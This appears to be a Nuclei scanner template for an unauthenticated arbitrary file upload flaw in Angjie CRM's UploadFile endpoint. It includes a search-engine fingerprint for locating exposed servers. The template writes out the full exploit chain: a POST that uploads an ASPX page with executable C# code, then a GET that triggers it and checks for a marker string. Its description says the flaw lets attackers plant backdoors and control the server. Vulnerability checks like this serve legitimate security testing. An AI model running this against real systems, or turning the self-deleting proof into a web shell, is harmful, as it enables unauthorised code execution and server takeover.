http:
    - raw:
        - |
          POST /file/UploadFile?fileinfo={'UploadUserNo':'0000','LastChunk':true,'FileName':'{{username}}.aspx','IsUseMongdb':true,'UploadTime':'2025-06-18T12:11:56'} HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /TempFileNew/0000_202506181211560000_{{username}}.aspx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
id: angjieCRM-UploadFile-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="CheckSilverlightInstalled" && body="AllowHtmlPopupwindow"
        昂捷CRM UploadFile 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 昂捷CRM UploadFile 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/lbNg3QWPB9WqQ9JSDPZG1g
    severity: high
    tags:
        - 昂捷CRM
variables:
    username: '{{to_lower(rand_base(6))}}'
